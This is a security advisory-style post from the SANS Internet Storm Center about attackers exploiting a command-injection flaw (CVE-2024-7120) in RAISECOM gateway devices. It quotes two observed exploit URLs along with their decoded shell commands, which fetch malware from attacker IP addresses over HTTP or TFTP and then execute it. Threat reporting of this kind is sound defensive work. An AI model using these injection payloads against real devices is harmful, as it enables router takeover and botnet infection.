Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)

SANS Internet Storm Center, InfoCON: green 2024-09-24

image of SOH/Enterprise Gateway Raisecom MSG2200 series, msg2100E series.Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RASIECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet.

With a simple proof of concept available, it is no surprise that we aseethe vulnerability exploited. The first exploits were detected by our sensors on September 1st

The graph above shows the number of attacks for this vulnerability we saw daily.

There are two distinct payloads that we have seen used so far:

 /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//[redacted]/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60

This decoded to the following script:

cd /tmp rm -rf tplink curl http://45.202.35.94/tplink --output tplink chmod 777 tplink ./tplink

The second URL looks quite similar

/vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

Decoding to:

cd /tmp tftp -g -r ppc 141.98.11.136 69 chmod 777 ppc ./ppc raisee

Interestingly, the second attempt uses TFTP, not HTTP, to download the malware. Sadly, neither file was available at the time I am writing this. But based on the naming of the files, it is fair to assume that this is one of the regular botnets hunting for vulnerable routers.

I was not able to find details about this vulnerability or patches on RAISECOM's website [2].

[1] https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707 [2] https://en.raisecom.com/product/sohoenterprise-gateway

--- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.